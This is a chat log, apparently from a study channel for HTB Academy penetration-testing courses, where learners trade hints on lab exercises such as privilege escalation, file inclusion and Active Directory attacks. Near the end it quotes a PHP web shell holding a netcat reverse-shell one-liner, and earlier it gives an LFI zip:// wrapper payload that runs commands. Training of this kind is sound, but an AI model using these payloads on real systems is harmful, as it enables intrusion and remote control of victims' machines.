I've followed the disassembling part in Linux for the "Octopus_checker" elf file.
I've noted that in the walkthrough, the call to the SQLDriver uses a "full" address, but in my kali machine it doesn't.
Here's what in the section:
0x0000555555555607 <+433>: call 0x5555555551b0 <SQLDriverConnect@plt>
This is what i have in my kali box:
0x0000000000001607 <+433>: call 0x11b0 <SQLDriverConnect@plt>
adding a breakpoint to the 0x11b0 doesn't work. It's probably some type of config issue i guess, if someone knows what it is would really help me, thanks!
I don't recall having to authenticate anywhere, at least there's nothing in my notes about it, are you having an issue with the second question?
yeah i got through some of it it's just trying to narrow my search down tbh
but my brain isn't braining
for the second question, I just checked bloodhound
if i remember correctly you can delete a file and reset the psw
don't remember which one
yeah, I've forgotten it too at some point, you can definitely reset it
yes I remember I've seen something about it when I set it up for the first time
also most likely I've forgotten mine, so I will have to research it
I also kept forgetting my Nessus password, so I finally wrote down in my notes how to reset it
I resolved without bloodhound, i was just stoopid
Glad you solved it
@everyone
did you try both possible cache files
yes
one keeps going away, I tried about 10 times yesterday periodically since they kept changing, and just tried three times
are my commands right though?
looks fine
Just got it. It was simple, I kept putting /root/krb....... when I was already in root. I just needed to name it without the root.
I also didn't use "export", I don't know if that matters
eh if it works it works
it doesn't like your get command
presumably the argument after it is throwing it off but idk, I always leave -c at the end if I were to use it(I usually dont)
I figured it out, but what does -k do?
I can't find it in --help or the man page
I believe -k is to use kerberos authentication
That makes sense, I'm going to read more into that later.
because its the impacket smbclient version
Can anyone assist me?
one moment trying to get the snippet
I am on HTB Academy Windows Priv Escalation, the Skill Assessment Part 1
and I don't know how to get on the system
I tried an nmap
but kinda stuck
nmap isn't gonna be enough
I see
During a penetration test against the INLANEFREIGHT organization, you encounter a non-domain joined Windows server host that suffers from an unpatched command injection vulnerability. After gaining a foothold, you come across credentials that may be useful for lateral movement later in the assessment and uncover another flaw that can be leveraged to escalate privileges on the target host.
For this assessment, assume that your client has a relatively mature patch/vulnerability management program but is understaffed and unaware of many of the best practices around configuration management, which could leave a host open to privilege escalation.
Enumerate the host (starting with an Nmap port scan to identify accessible ports/services), leverage the command injection flaw to gain reverse shell access, escalate privileges to NT AUTHORITY\SYSTEM level or similar access, and answer the questions below to complete this portion of the assessment.
so thats what I read
yes and there's usually a related question underneath the spawn target button that leans into what you should try first
nmap shows open ports > open ports = vulnerabilities
I did my scan
you'll need to combine all of the information from the whole module to gain access
I think I get what you're saying
I have to go back to a few modules or sections
to get the answer
does it tell you to brute force with ssh and hydra on that port?
if i'm understanding the directions correctly it does?
it does not
it's telling you to brute force the existing auth mechanism on the website
nowhere in the question does it even hint at ssh
and being able to access it via web should be the further clue you're barking up the wrong tree
thank you so much
don't thank me for your inability to read
lol
Hey quick question does anyone else ever experience their shell breaking when they try to upgrade a dummy shell to fully interactive?
yes sometimes that happens to me
I can't enter shit, it interprets [enter] as ^M instead
i have to kill the window even and get a reverse shell again
am i doing something wrong?
once you get another reverse shell try using python
i generally have good luck with python tty
tty is short for teletype aka an interactive shell
don't forget to close the single quote
try the cheat sheet here https://github.com/RoqueNight/Reverse-Shell-TTY-Cheat-Sheet
try spawning a bin/bash one next
mind if i send a screen cap of whats going on
that sure don't look like an academy module my guy
its from shells
why does it say offsec proving grounds?
"connection from a "Photographer"" as shown in your screencap too
i changed the hostname lmao
also when you go back to fg do reset and it'll reset the terminal back to normalish
either way doesn't look like it's related to https://academy.hackthebox.com
yeah it means kinda normal
what differences?
hopefully an actual interactive shell, for one
hopes and prayers are what seemingly fuel every penetration test
i updated to vmware workstation pro 17.5 and my kali instance has been freezing nonstop lol
i hope and pray it doesn't do that on the exam
skill issue tbh
it freezes with the highlight capital i cursor and won't let me click windows ¯\_(ツ)_/¯
just making sure have you tried clicking right ctrl
I have it in the mode where you don't need to do that, like my mouse is free to move from the host and the vmware window without having my mouse locked inside the window
hello, in the LFI and File uploads section of File inclusion module, once we upload a profile pic, we access the uploaded pic by viewing the page source code. now when trying to execute the shell we put in ./profile_images/ like this http://x.x.x.x:port#/index.php?language=zip://./profile_images/shell.jpg@cmd=id. the reason to use the dot before profile_images as per the module is that the vulnerable page (index.php) is in the main directory. what does this mean exactly? I didn't get it
it's telling it to look from the /var/www or wherever the webroot is
instead of from system root C:\ or /
Ever wonder why you need a ./ before a Unix shell script or command of your own in order to run it? Here's what the Linux dot slash does and why Unix systems require the ./ syntax.
ah k thanks
i hope that link helps
it could also be what moo linked
it's not a native command so you have to tell linux that it is in fact a command and NOT an image
(get tricked filters :^))
thanks @rustic sage @fathom pendant
no worries i love to help out but i will never be as helpful as marcielee
so /bash/ -i
i mean you can just type bash
oh
super cool!
no more broken shells
i'm extremely tired and none of my things are working will come back to it tomorrow
for an explanation for it, and I feel dumb too
basically kali uses zsh by default obviously
feeling dumb is good
so you gotta swap to bash :p
always keep learning
except when you gotta take the oscp exam, this mf is coming up soon, I've been on the grind lol
I want to do that but getting as many skills as i can first so whatever i apply to will let me work remote
make sure to get passive income too!
i should have taken the cpts exam already but i was busy trying to buy a house and now that i have a house life just got a whole lot easier
passive income gives you the freedom to do what you enjoy most
exactly keep on that grind tho
ima get back to this lab gl with this
so you want to say that in fact I had to look for another parameter, and not go step by step through the chapter?
I am not able to get the MAP + RW in the xdbg after importing restart-servive.exe into xdbg debugger
Hey, I'm stuck with the last flag, I sent you a message
Hello to everyone. "Attacking Common Services - SQL"
Any tip about this? Cannot get the hash using responder.
I don't understand how to do that, help me pls
On *File Inclusion > Log Poisoning* Are you supposed to be able to get the flags with PHP Session Hijacking? I have no problem getting cmd=id. But as soon as I try to change cmd, I get nothing back
Where do I have to find it?
maybe if you run responder and forced the srvc to have to auth to something you could get the hash? This is a hint, not speculation.
I supposed to the question
i think the question will give you the credentials
Has anyone done the advanced XSS skill assessment I could ask a question to?
I have connected by ssh to the target. What I need to do?
Just enumerate and find the flag. Search the folder. Usually you find the flag on users home or Desktop.
Secondly: Try to not do questions like this before you search on your own and try. If you feel that you tried everything then ask on the groups or search online
nvm, managed to solve this with PHP Session Hijacking
Suppose that I already tried that
always ask the specific question, include what you have done already and ensure to use spoiler tags for spoilers. You are way more likely to get an answer
well, you maybe did it wrong? It worked for me
just checked my notes
Could be, i try and let you know. Maybe i am missing something
99% of the time something is not working for me it's something minor, rereading the section and going again always helps
Hi, i kindly need some sort of clarity as to why i am getting this error
keepass2john Login.kdbx > kdbx.hash ! Login.kdbx : Unknown format: File signature invalid
I used Base64 for the transfer and the MD5 hashes match
which module is that
it's Password Attack Lab Hard
generally, don't use b64 to transfer anything other than text-based files
Ok
there should be other ways that you can transfer files?
At this stage the available path seems to be file upload however I am having trouble making this work...
hello guys I need help with NoSQL skill assessment two, can someone help me
just ask the actual question and say what you have already tried. People are doing different modules so you may get an actual answer if you are specific about what you need help with.
okey sorry
I tried all payloads that I learned in the lesson but they didn't work
I can not bypass authentication
please help me
Okay, since I acknowledged that individual modules seem to not be possible to be purchased and given as a gift. I had one idea to bypass the problem, but I don't know if this could be done or is even legal.
Is it possible to create an account and buy the specific courses that I want to gift, then give this brand new Academy account as a present?
I think HTB gift cards work on the academy. There's an option to buy cubes you can use to buy modules using a gift card on the academy. Not sure how you get a gift card though.
That could work?
You can buy a gift card and send it to the person
better to present gift card init?
you may DM if you didn't resolve it yet
I need help with NoSQL two skill assessment, can someone help me
can you buy gift cards for the academy here: https://www.hackthebox.com/giftcards
My god, Pass the ticket on Linux, I learned so much with keytab and ccache, didn't know about this
What a beast module
Good afternoon everyone - is anyone able to help me on the Attacking Tomcat section of the attacking common applications module? I have RCE but can't find the flag.
Nevermind - got it
On the Skill assessment for File Inclusion. Can I get a hint what wordlist to use? Doesn't seem to be the LFI-Jhaddix one
For the next homie: check ALL the folders, you can't miss it.
you don't need one
Elaborate please
spoilers and what more do you need then from a wordlist xd
you have all you need now start enumerating to get RCE
well I guess I manually guessed that path, apache or nginx..
but just thought one should use the automated scanning
ACTIVE DIRECTORY ENUMERATION & ATTACKS
In Attacking Domain Trusts - Child -> Parent Trusts - from Windows:
Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain.
I use ls \\academy-ea-dc01.inlanefreight.local\c$ and can see contents of C drive but not sure what command to use to get into subdirectories from here. If I try using ls \\academy-ea-dc01.inlanefreight.local\C\ExtraSids$ I get a "cannot find path" error.
the picture is added as spoiler?
and xd
I need help with NoSQL injection in the two skill assessment, can someone help me
I still can click and see one key point to solve that assessment
find out what $ means here
ok, just thought it was enough to add it as a spoiler...
don't rely on automated tools for such simple tasks
fair enough, thx
ah i see had to keep $ next to the c and not put it on the end
hey guys, in module "SQLMap Essentials" ==>> "Attack Tuning" I got the "flag 5" content: HTB{7....7}.
but it gives me:
Error
Incorrect answer!
does someone know HTF I deal with it? (BTW no, there R no spaces and stuff, just the flag)
not sure Y, but G=1 fixes it
if someone knew please let me know ...
it might B HTB's error that they need to fix
Hi, anyone doing the "WINDOWS ATTACKS & DEFENSE" module skills assessment? The machine is really really slow, I cannot even do a copy. Not sure what the issue is.
hi can someone help me with footprinting lab hard; I'm unable to ssh to mysql from the user t**. Am I on the right path? I have tried with password to connect to mysql. Error there too. Any help would be great
getting this error when trying to ssh
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
checkout the other ports, doesn't sound like you're ready for ssh yet
Hey guys, I'm doing the Active Directory Skill Assessment 2
I'm currently trying to escalate privilege into the machine MS01 172.16.7.50
Tried mimikatz, but as I'm not NT AUTHORITY it doesn't work
Tried to use PrinterSpooler.exe but it didn't work
Can anyone give me a nudge?
which question are you working on?
- 1 Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I'm connected in xfreerdp to MS01 by using BR086 user and a proxychains
enumerate the rights of the users you have credentials to
sechangenotifyprivilege
You mean about this one?
Tried to google it but I can't see how to use it
not that, check the privs of all the users you have
Ha ! Thanks
I'll try
Well tried on both user ***20 And ***86 at the moment the only other user I have is an sql
might want to remove that, spoilers
at this point you have full admin access to SQL01 right?
Yes
Mmmh... Okey I should try to know more about what rights are enabled for the admin of SQL01
I have a task
The flag will print in the banner upon successful login on the host via SSH.
I'm logged in, but didn't get any message, also I checked all the directories. And I don't understand how to find the flag, I don't even know what it looks like.
The hint is "This is where Alice went..", how can I use this?
Skills Assessment - INTRODUCTION TO WINDOWS COMMAND LINE
It'll be above the first line of where it lets you type
The banner is the "welcome" message
I didn't receive anything else, only
user0@10.129.204.9's password: Microsoft Windows [Version 10.0.22000.1219] (c) Microsoft Corporation. All rights reserved.
Weird
it's before you enter the password, ssh clears your terminal after logging in
oh, i found it, thx
Is it? Because the question states "on successful login"
yeah just checked it, question should've been clearer I suppose but, it's also... right there
Anyone familiar with the Getting Started lesson? I'm on the Nibbler exercise and am trying to reverse shell in, but the netcat listener is not connecting to the target
what have you tried and what's the reverse shell you used?
@next bronze I'm following along with the lesson, was able to get the image.php file uploaded, then added the Bash script specified in the lesson, and then started the nc listener and it just waits forever
Then tried to curl the image.php file to make sure it is there and I'm getting an error saying that it is not found on the server
Just rechecked the content directory and now the image.php file is gone so maybe that is the problem?
you need to curl it so that it triggers the reverse shell, if you don't find it, upload again
and make sure you configured the ip and port correctly
Question regarding the image.php file, is it supposed to have both bash scripts or just the longer one?
From reading the lesson it sounded like both and maybe that is the issue?
you mean these two?
<?php system('id'); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
Yes
you need to understand the purpose of the two commands there, the one on top is a simple id command, really just to test if you are able to execute system commands, once that's confirmed, then you can put a reverse shell in its place, which is what you're aiming for
Ok so the id portion is working, when I curl the file it shows the id
So something is up with the reverse shell command
Is the 10.10.14.2 YOUR tun0?
And are you listening on that port?
nope just taken from the example
Could it be the port that I am using? Any recommendations?
Steps > start listener > start shell
the ip should match your tun0 ip, the port should be your nc listen port
I think I figured out what I'm doing wrong, 1 sec to confirm
Got it, I had the target IP in the code instead of my own
Is there anyone I can ask about the kerberos attack module skill assessment last question? I'm stuck, I obtained the pwd from the two accounts, 1st with kerbrute (daniel.whitehead), then I obtained the hash from annette.jackson because it has an unconstrained delegation on the server01.. then I entered server01, using rubeus, I monitored the sessions then I obtained a session from jake.kirk but jake is not privileged.
Last question regarding this, the Python code it recommends using, do we add that to our image.php file?